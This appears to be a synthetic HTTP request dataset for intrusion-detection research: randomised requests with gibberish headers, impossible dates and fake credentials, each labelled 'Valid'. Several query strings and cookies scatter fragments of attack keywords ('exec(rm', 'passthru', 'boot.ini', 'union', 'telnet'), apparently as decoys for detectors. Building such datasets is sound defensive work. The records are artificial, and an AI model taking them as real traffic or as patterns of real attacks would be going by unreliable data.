Accept-Encoding: gzip;q=0.8, deflate;q=0.7, compress;q=0.7
Accept-Language: 1-sedmbn;q=0.8, Eeia-Ee
Cache-Control: no-transform
Client-ip: 221.29.121.34
Cookie: eadthfm=525;woNfOilt=5177;oaufsrqawecO=6Fmdh@;haloy4onerlnt=elles7uta e;etnejek=oevrvnsreuh;iumSso6uEn=m
Cookie2: $Version="9"
Date: Sat, 22 Dec 07 09:23:38 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
From: pTja@hlne.com
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: *
If-Range: Sat, 11 Oct 08 09:40:41 CET
Max-Forwards: 551
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: /ntvteck/sAflByrm.rar
TE: trailers,trailers
Trailer: Authorization
User-Agent: sletirbsoo (1nrWzzrDy; sQzJlp; av6322EAvR; 8.7R7xeB; mmqIHfJ)
UA-CPU: MIPS
UA-Disp: 2046,4023,32
UA-Color: color16
UA-Pixels: 8766x859
Via: ali6l/5.9 226.192.75.177, FTP/4.7 www.ue5ag.gif
Transfer-Encoding: wtohs; ntdc3e=3reztFd
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

iy=1047&ccniwtr=ose1schdive&ereejZ9lot=p$hmruall&rosecoskxgetta=t&ErlioEm9aepbrns=(L&lrsoot6Deoram=170324248&c25jpIpTo=)   ( |    (epxjc=ss*)&g5X4ejJHaR=@inE@m

End - Id: 37716
Start - Id: 4737
class: Valid
PUT /itsehNe/lnA/eneeEeuse1si/4v@ZC3y36/tBXEKs_K.Ol./r2q.tiff? HTTP/1.0
Content-Length: 28
Content-Language: nwtsD
Content-Encoding: compress
Content-Location: http://egzOl.ch/Cseiimok/e90a/fNuyia/iv9sr.jsp
Content-MD5: dGh0YWVoYW5uYWluQTVldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Fri, 02 Jun 06 19:15:01 GMT
Host: www.ttovt.gov:80
Connection: close
Accept: video/*, audio/x-wav;q=0.4
Accept-Charset: windows-874, euc-cn;q=0.2, iso-10646-ucs-2;q=0.4, iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=14
Client-ip: 74.45.236.167
Cookie: Csxgmr=s8eNcmd5ie;opk69flztys=0351271;Ueall-KtU=4176659
Cookie2: $Version="84"
Date: Fri, 13 Nov 09 12:26:25 UTC
ETag: "e26op9m8ECJNBlz1Lv"
Expect: 100-continue
From: potNyp8h@nruv.uk
If-Modified-Since: Tue, 18 May 04 01:19:50 CET
If-Unmodified-Since: Sun, 26 Aug 07 05:02:57 GMT
If-Match: "yNoSYkUUn43QutSb"
If-None-Match: *
If-Range: "6.kVY6B1Y-4j1WEP6fCw"
Max-Forwards: 19
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: Basic Mm9lbjpUcnJ5MA==
Range: -31108
Referer: /k8t4nP.jsp
TE: trailers,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: alEh (e7@@hQk; pF.Cgf)
UA-CPU: MIPS
UA-Disp: 377,5195,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4366x138
Via: HTTP/3.0 www.etynoet4.jpg, HTTP/3.4 www.oowonoe.png, 3.0 100.236.46.238
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 64993875
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

skdswanorbm8if=evae 6s -LSg 

End - Id: 4737
Start - Id: 11399
class: Valid
GET /dilehhnimwoooiREse/teexolUeeXtioiec/tegc9/erFRqoset/stss1ucdtfE/seee/c9xXoJXS7n1MmzuRNH.aspx?6zsptwmsoio=eg5connect&In6te=wNkG1aElbo&koees9rlunn=5658 HTTP/1.1
Host: 32.13.7.13
Connection: keep-alive
Accept: audio/basic, application/*;q=0.8, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 178.230.95.66
Cookie: rsAqy5mtoucnr=byioToNnsnulloeilW;izoGgmcSame=56587767;AfhtThLErh=nEtorjEch7e;ti=702805
Cookie2: $Version="98"
Date: Wed, 30 Mar 05 10:42:53 CET
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: diCxno
From: snso@neess.uk
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Sat, 30 Jul 05 01:41:00 CET
If-Match: *
If-None-Match: *
If-Range: "BuHC_hr3EP@3fpxBWTH9"
Max-Forwards: 0
MIME-Version: 4.6
Pragma: gyN='int'
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: eoel y7genobF=daaSs
Range: -422,-567468,98305-
Referer: /em8pen.gz
TE: trailers,gzip;q=0.9,gzip;q=0.3
Trailer: Connection
User-Agent: Mozilla/3.0 (X11; U; Solaris 0.8; sM-am; rv:4.1.5) Gecko/63636094
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7012x529
Via: 1.7 www.tmseioi.html, FTP/2.9 www.nLt0c.jpg, FTP/8.0 185.66.207.211
Transfer-Encoding: deflate
Upgrade: tmmsns/7.8, ettTn/1.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11399
Start - Id: 10167
class: Valid
GET /rOgCDuvAH1Fv/rwo0uhtlorevekth/o3XY/hcahreL2Aeiswls08h.htm?ce3qrta2kci=aeg1rrs&nZylsli4t5clbey=jc3nth7uso&iulrfte=nxreengIn0M8ogros&7m21sjthtt=u_R&asC7iitp=r&faettrAe=veg7YakSlQX&ndfolbsatt=sxt+rn6+mtq&xgt=olh2eUobject8octeseh&esock_streammTmochampv=onah&3xXlinkacceptN=88654111 HTTP/1.1
Host: www.la7ektpYv.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: hlam-ebr6tu;q=0.8, 3-uhci3haS;q=0.3, wFgoc8a-tmm;q=0.1, tV-7fvq
Cache-Control: e='tminhwQa'
Client-ip: 206.184.127.225
Cookie: CDwCH=ersieoeual2b9nTab;EEFiframeiof4uzZi=nfu;thomeK1linkdsy-yXz=23069;g5Bdj=3306982
Cookie2: $Version="5"
Date: Tue, 14 Sep 04 24:40:24 CET
ETag: W/"3t_JoJnyS4lk6cjv"
Expect: hjsoRil=tMarhto1;7uvr=rhOcENs
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sun, 06 Aug 06 12:29:29 CET
If-Unmodified-Since: Sat, 30 Jul 05 04:02:18 GMT
If-Match: "Ab8YD-nz9OnWeh3Bx"
If-None-Match: "4ppMGY3ZDj7vZd5N@j"
If-Range: Tue, 29 Jan 08 18:02:44 CET
Max-Forwards: 251
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: eiyt ntinogsn=uydts
Authorization: NTLM ZWR1dG5pdHRUc29kYmVzZWJ1Z3lha3FzYXFub2dBYXVlN2l3dg==
Range: 35-
Referer: http://y8nbac.ch/edeeeaww/Aoa4ueo/yhbluap.nsf
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 7.6; he-ue; rv:4.0.0) Gecko/28325789
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: HTTP/7.7 www.2e8I03.html
Transfer-Encoding: 4rrmah
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 109 252.20.208.165 "rNuyl" "Mon, 17 Jul 06 17:30:19 GMT"
X-Forwarded-For: 104.138.147.78
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10167
Start - Id: 3074
class: Valid
GET /a4L/tboot.iniN1DOT_s/hefsIepsa/I7cNiUStP2inputGupdate/ecinCsdolH8t0rib/o.t2lw0D7C_-tbDZGTTG/rtco/tjMNkMuTqAbjJ.@I2TT/pwEkKSB/ucavhNO9U.jpg?espahavunjce5u=rZpV5u&d4ahtpris95E=+Pmeo+ntust%2F3er%29dtoe&rn0bfkgd2la=477&sc9nOyzp9=8%5Cupdate&seiccltgo52t=iW6h.&x3io=yw+%26 HTTP/1.0
Host: www.air5r0ci.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 64.11.119.67
Cookie: 9replaceexec5_5connectqtz=it4Vkl
Cookie2: $Version="6"
Date: Mon, 12 Sep 05 18:20:57 CET
ETag: "mpq8MPbSS4MTt2_jKVo"
Expect: az4ds
From: ssmefI@deee3y.biz
If-Modified-Since: Tue, 18 Aug 09 19:50:37 GMT
If-Unmodified-Since: Thu, 17 May 07 23:40:51 GMT
If-Match: *
If-None-Match: *
If-Range: "HfmH47NKUGeofJPU"
Max-Forwards: 65
MIME-Version: 8.9
Pragma: 3r=t
Proxy-Authorization: inwn hvne4tt=Gseae
Authorization: fdsit Itdz=itHxpvS
Range: -3953,-5
Referer: http://ulsaa.gov/mifnjhc.msf
TE: gzip;q=0.4,chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/0.1 (compatible; s9tiiieJi; Open BSD i586; smxaec8Bs; wf8hchp; ed2l)
UA-CPU: Sparc
UA-Disp: 3985,330,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9081x8193
Via: 2.3 126.40.68.232, FTP/2.6 www.ayar.css:17317
Transfer-Encoding: gzip
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 187 43.192.80.46 "lhthnlt" 
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3074
Start - Id: 21920
class: Valid
GET /jXbe7Hbo/CpositionoWND_a/trmp/nrmsbeiscen/uxIB_/nBDzdXo/o7iI7/sTSn8lreerdu/qOPvFhN3ifSED5.49m/dsgeisqorrebaq6/Jm.cfm?4Du=n59FOr&tb=1176&so=wenlnenmsofDns&nlvt=1531745&oha=4523&hptleitaAtToson=3482 HTTP/1.0
Host: 97.189.0.194:80
Connection: chtwdh4
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.6, utf-8;q=0.2, utf-8, iso-8859-1;q=0.7
Accept-Encoding: 
Accept-Language: hz-Chythh;q=0.7, hayReir-hsyrSzit, gpgdoayc-tekeoh0;q=0.5, erryenai-Qxx;q=0.3
Cache-Control: no-store
Client-ip: 185.90.130.232
Cookie: chho4htuoouiivR=8276510430
Cookie2: $Version="2"
Date: Sun, 08 Jul 07 05:28:25 CET
ETag: "L_w_yfqvC9Y.YuBOQlG"
Expect: 9hosd
From: 5ctoslrG@viuSohue.it
If-Modified-Since: Sat, 27 Jun 09 18:01:36 GMT
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: "ILNX0-bqaYEj-4QPm"
If-None-Match: "mQH.mdqiFzDwlBDWLTZ"
If-Range: Sat, 24 Mar 07 11:13:35 UTC
Max-Forwards: 37
MIME-Version: 5.9
Pragma: bSohsile=esvhiXe
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: 54-57527,1340-
Referer: /6orilvt/tdneae/dfirhc.sh
TE: gzip,gzip,deflate;q=0.0
Trailer: Referer
User-Agent: 9iw7r/0.5
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6616x2901
Via: 1.3 www.genlo.jpeg
Transfer-Encoding: deflate
Upgrade: etdaw/8.1, coe/5.4, 79eOoi/1.6, 3ean/3.4
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 160.249.23.173
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21920
Start - Id: 26112
class: Valid
GET /toy7hv/sycVYHTqPA/atzslEXbU7GtT0/hDw.gif? HTTP/1.0
Host: 234.243.174.164
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-ce;q=0.2, iso-8859-9, isiri-3342
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 15.51.184.61
Cookie: 16logvlN=g8l;tdrecDecy4o3T=d43di
Cookie2: $Version="23"
Date: Tue, 09 Oct 07 18:11:58 GMT
ETag: W/"leM058aFvFmPe0_B"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Wed, 13 Aug 08 19:50:41 GMT
If-Unmodified-Since: Tue, 08 May 07 12:07:02 UTC
If-Match: *
If-None-Match: "Vi_3H3Q5XHjiE0WJv.5Y"
If-Range: *
Max-Forwards: 770
MIME-Version: 5.1
Pragma: Rvrt=ed0s
Proxy-Authorization: NTLM MHJzZnN0ZWZlZWNxcHNpbnR1eXNoMW5udWhpVFRuN3hlaTg=
Authorization: hh3R zada=oeel
Range: 5570-,706880-3
Referer: /s8Se.nsf
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 3.1; ai-ht; rv:5.9.3) Gecko/86207445
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5001x5670
Via: 6.9 210.219.207.233:32851
Transfer-Encoding: gzip
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 759149792604
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26112
Start - Id: 31646
class: Valid
GET /jMlsgX4O/dic5aoii/aPO8I0aJ3j/ptoAu3oaeptru2Kttah/oary8elreeaeTlnhc3/Ndnrm.js?vtebyandat0sp=au+s&ewttelreubHnpi=p8reen+ies&b0tsev8aoR7dt=60&s8eoeh=%7Edexec%28rm4rcp%5Bo+7tam&toykht=stylebbesebo&iLteoan=2034&n04ea8so=290&Tv8evalX.httpKIZ@=sEA5p3&07DmGf8R-tmp-o=649&qNrwte=lnndt6%5D%2FxtueieinoGd%2Fn HTTP/1.0
Host: 20.239.177.177
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 216.249.237.225
Cookie: g8ayNx=e;mw= it=ngnSci8eyty;6CPIKkU9=rnt;pvbi9pctep=r;sfngwsh=fe
Cookie2: $Version="7"
Date: Wed, 14 Dec 05 16:29:07 UTC
ETag: "MDg-mSLIJHgr30La"
Expect: ioefgih
From: 5njLtrtq@8sti3c.net
If-Modified-Since: Fri, 09 Apr 10 02:45:38 GMT
If-Unmodified-Since: Tue, 24 Jul 07 06:52:47 CET
If-Match: *
If-None-Match: "tcvYqDD3t5nS90a2gq"
If-Range: Fri, 19 Mar 10 02:50:27 GMT
Max-Forwards: 3
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic TnlFY2hwaTptdHN1YQ==
Authorization: iaYx rgei=hdunz
Range: 8087-,193934-,399995-4368
Referer: http://www.lreos.com/Gmlo/acntro/nsaEl5h.doc
TE: gzip;q=0.3
Trailer: Warning
User-Agent: oSlt/5.5
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: shior/7.8 25.244.100.113, Vut/7.7 www.ieeev.gif:8, 1.3 178.250.160.49
Transfer-Encoding: compress
Upgrade: noyiNn/8.3, tMu5aT/7.1, acs/5.6
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31646
Start - Id: 17701
class: Valid
GET /sfdooloegEeihm4/qnlHeedagc8oot8aqs/yxus@7TMy-YBB/pnlrMmfoete1DsatE/EhToohc/qeia5lseo9rilke/cu0Oa5/aeqeLAbticptemsTtab/eJoYoiIt5Lw63Sx/idCMjdu/rtnpmIwnsevety.tiff?tlentt0n=080919&sokaSaspaO=qy67ta9ciegr HTTP/1.1
Host: www.s0Er.uk
Connection: keep-alive
Accept: audio/*;q=0.4, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip;q=0.2, gzip, deflate, deflate;q=0.0
Accept-Language: ctt-nOl
Cache-Control: max-age=615
Client-ip: 109.42.54.64
Cookie: eTshvhsrdtGml=5682316;hn=vgedpluE2O;M0homeOallHdwa@Heval=38;ctts=<[;tseE=5;2@.RnhJG=ehdci~G:
Cookie2: $Version="8"
Date: Wed, 15 Jun 05 18:09:11 UTC
ETag: W/"RlvvOiuDFYgKT3Y@_L"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Sat, 16 May 09 10:22:10 GMT
If-Match: *
If-None-Match: "CCZJuM4vb4EJrOhAgpk"
If-Range: *
Max-Forwards: 5
MIME-Version: 9.0
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: alotgT ecgh=taeejts
Range: -579,-690
Referer: /Zsssi4eb.aspx
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: 9a3i9vd http://www.d3kgmhna.it
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 3.5 179.155.178.211, 5.3 www.mrat2.jpeg
Transfer-Encoding: gzip
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 1990528944468
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17701
Start - Id: 15648
class: Valid
GET /ieqb/ht04PCeNpq_GMFj0EZ/lnDe6RYqna_kcoCd4jB2/yolriectfiee7t/efi/taIrpnviaemteap/b57O@LyTZvZoefSjK.6w/Wox.C2dcSGLuO.asp? HTTP/1.0
Host: 69.27.119.147
Connection: awt3et
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese, iso-2022-jp, x-mac-greek, euc-cn;q=0.2, iso-2022-kr
Accept-Encoding: compress, deflate;q=0.6, identity;q=0.3
Accept-Language: *;q=0.7
Cache-Control: guntruo='srisqlfn'
Client-ip: 178.165.103.59
Cookie: 08deleteYfaGGSy= e%a4in&httpsoinit3;goposmeknp=0decho;kiframejDdelete5rUr0rY=14;cEtrRaPPs=w0cosuswtagz
Cookie2: $Version="61"
Date: Mon, 22 Aug 05 03:10:09 CET
ETag: "bg6ooN88K@gpwH.ULdL"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Mon, 19 Sep 05 13:08:02 CET
If-Unmodified-Since: Sun, 20 Dec 09 10:17:10 GMT
If-Match: *
If-None-Match: "svrb.ZOjz1KABN1My3ki"
If-Range: Fri, 25 Dec 09 04:12:03 CET
Max-Forwards: 67
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="scip7hYi"
Authorization: Basic aGU4YTpTbTdhaDU=
Range: -29,-2
Referer: http://www.lrieas.be/hnu2m/y8tkn.html
TE: deflate;q=0.0,deflate;q=0.3,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (compatible; Konqueror/5.8; Windows NT; irfoeenzon)
UA-CPU: PowerPC
UA-Disp: 6429,5125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1680x9534
Via: 3.0 31.95.87.189
Transfer-Encoding: o6oriq
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15648
Start - Id: 23187
class: Valid
GET /bi_p/9tq4tIydpmaetot/tx2snnpuElpnn/hfbavUbQ7xprggh8/rrsvpw1jetgNessfLrO/oQHskTd.7A/ahke7rnTsp/9rpost.shtml?Beanhattee=1746&mtnrJDnsioRro2c=iee45phpaf%3Creacoe%2B0daib&IECV4passthrudn=sh+&x5DQ-RZHAX=esSZD&ileipnt7sTn=h+oh%7C&pagatehxfitfovo=5&YQxz=c0N6o&tg4asa=sFc%4068.YHyIs&ety8behlvwoAr=380285&4b=6rnoieunt&aho=%3DzeenaoiEto HTTP/1.1
Host: 223.193.250.0:1
Connection: hoietosw
Accept: text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=829
Client-ip: 195.72.80.101
Cookie: fsdyylbtIeHU=tH4qw_0R;1botlcthodyin=1;hyd78I=3;t0ofba=nj5u
Cookie2: $Version="98"
Date: Fri, 28 Nov 08 11:13:57 GMT
ETag: W/"Xq5.Xw_NbR_Zdkg9UqBS"
Expect: 100-continue
From: yEynS@yostnHon.org
If-Modified-Since: Thu, 09 Nov 06 12:17:48 CET
If-Unmodified-Since: Mon, 22 Feb 10 18:26:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 23:45:14 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM OTZodXJlQ3RtWDh0ZThheG40ZWFhZ2lyVHBIZXRpdHZiaGVvc2hI
Authorization: NTLM eGY2V3Vob2h3aXJzb0lybm1BdEk1b2kzaGRjcW9lZmduQXowbWltMGkwZWthZXM=
Range: -993347,19-784
Referer: /nasd9i/22lrpei/dahe/h5rlc2s8/lgsoie.wav
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 1.7; dp-qn; rv:9.5.8) Gecko/72311799
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8987x923
Via: HTTP/9.1 236.4.175.107
Transfer-Encoding: xertb; cUrl2Ae=ahetlI
Upgrade: Nmotn/6.8, q7lyw3/3.8, lnmv/7.8, r3di3/6.0
Warning: 909 www.n8hewn.css "tEwe81aorN2bNEEtoee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23187
Start - Id: 9075
class: Valid
GET /rPJ79AlVqTz2x82y2zXn/svuSthata/dqPm/0zi4BPDxterm7gD/eh7E2PX2S9/lt/rets/czp/aittaobehl7ilkit/npOt.mdb?gwj1qZ=Msr8Vasitesen&iwienidydhewe=e6neEmwl&rimt5atznig=aNVdz12&twuazvhoiszpncn=dxVjdAAX&Tiur=2r&1maRseosetn=hl%3F%3Bg%3Dulhrso&d6ateiexr=+eettNeai6pautoexece%7C&ooeogrenos8o8ve=%2Fnthe&ed=a%25urev97Jconnectxo HTTP/1.1
Host: 9.104.230.241
Connection: close
Accept: image/*, image/*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.9, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: Elq2rto-pe;q=0.4
Cache-Control: no-store
Client-ip: 207.28.5.68
Cookie: lmiArut1mzrs2t=eutexml;7LiWItelnetD=iXM4TkkBa1p;XfK0a=hvRU.f;2e2hthdWbcheh0l=E-lt
Cookie2: $Version="4"
Date: Sat, 15 Dec 07 11:05:29 GMT
ETag: W/"ft36s0etOa-rrrmUqlzy"
Expect: 100-continue
From: riunul@rssjpw.cz
If-Modified-Since: Sat, 12 May 07 08:28:27 UTC
If-Unmodified-Since: Tue, 14 Jun 05 06:09:04 UTC
If-Match: "oL9oezWzO92mvyqTS.t"
If-None-Match: "pN4TqxXG4xAr1Ngq"
If-Range: ".fKVG@WaBGLdiUbFU_O"
Max-Forwards: 914
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: NTLM clN1eG5laE9pYW1tY2Z5YWF1bmhvY2FhczNzdTR5bmZuVGVoaW55YWU=
Range: -003877,64218-4,-17
Referer: /sisaec/iaag5ten/uuoi/rQa3ret.css
TE: trailers
Trailer: If-Modified-Since
User-Agent: sEpRfqFqI6 http://www.srso5oxh.ch
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 010x4467
Via: 2.3 114.232.9.151, 0.8 160.76.87.193, HTTP/5.5 88.23.135.186
Transfer-Encoding: AemvaE
Upgrade: nqs/6.0, nEtzdl/8.3, shoO/3.9, eystl9/7.4, wxah/2.3
Warning: 991 177.26.146.73 "etpo8OtaAfvisutud9o" "Tue, 12 Dec 06 02:41:54 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9075
Start - Id: 31487
class: Valid
GET /aK33mVHrSq.D/ARnt/rtr/eiSei/tus1wso2g6ee/atn./p-NAxng.Zpu/vallTexec.asmx?oa1art0n=we4r%24&1ftosiN=o%7EiiiOLerloexechmnull&setec3LentsAi=tmpffi+&Uuteptohsaa3=setcinh&6aeQp=hhome%27+divtbft%3EyuitaLTps&zNLEPQ=mrescsas5rgfdvhap&tar=rrontt%28T&E.BIX=2ToyctwEh&trxrtgmeaoy=neebodyuniondh%27E5oe&st=Ias6c%3Fh%25suRc%5B HTTP/1.1
Host: www.qelhe.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: d8t3Itnu-hety;q=0.0, sdd-ogsQnto;q=0.1
Cache-Control: sag=time
Client-ip: 242.224.6.251
Cookie: 4acse5rBtnhj=o o;wbhfscc=nph-;Es;fnfhawwt01yloeb=2rtu\nkmih7q;eltdmeEoeft9=ovsnLzwSuUi
Cookie2: $Version="93"
Date: Tue, 07 Apr 09 06:37:11 CET
ETag: "1xH9IKU3faTSn0ToDq0"
Expect: 100-continue
From: ihbhu@oirwl.fr
If-Modified-Since: Fri, 03 Dec 04 22:29:22 CET
If-Unmodified-Since: Tue, 22 Nov 05 08:30:37 UTC
If-Match: "4GFvSwfX5L82nOGFbeFH"
If-None-Match: "TrS2O3JV8ly5oC4xHc"
If-Range: Wed, 01 Jul 09 21:27:22 GMT
Max-Forwards: 3856
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM amRhcVN5b2l1aGlHdG5wQWV3ZURoYWV0ZHNuc3NydHR0RmVlb1Bn
Authorization: bdit rhbu=ssexsc
Range: 88432-49
Referer: /Eetlsei/2ue4i/sour4tr/hht9.tar.gz
TE: trailers
Trailer: Connection
User-Agent: ynnrixswzs/2.8.2.7.3
UA-CPU: Sparc
UA-Disp: 4970,305,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 484x1465
Via: HTTP/7.3 www.jtch.js, FTP/0.8 www.ekeaLK.js
Transfer-Encoding: deflate
Upgrade: edf/0.2
Warning: 334 186.45.95.188:492 "4a7905aupt5ae" "Thu, 09 Aug 07 05:54:53 GMT"
X-Forwarded-For: 159.122.226.252
X-Serial-Number: 8380011
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31487
Start - Id: 29754
class: Valid
GET /sKzRwLvEpBwqp_v7X/q0lib.EUtY9DNYQ7/tL/sgdNXLJV1ySd.tiff? HTTP/1.0
Host: 129.81.37.65:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=76273
Client-ip: 78.44.8.103
Cookie: bi=shWgbsrnhiuH78eDN;ksam1VSqAqN6W=3451719;etnllxks=othLqzuoi
Cookie2: $Version="5"
Date: Sat, 06 Nov 04 06:53:25 GMT
ETag: W/"XKkFV1X.H33kCpiu"
Expect: 100-continue
From: aaaaonr@hEtmerN4em.biz
If-Modified-Since: Mon, 28 Aug 06 24:56:30 GMT
If-Unmodified-Since: Fri, 24 Mar 06 10:29:03 GMT
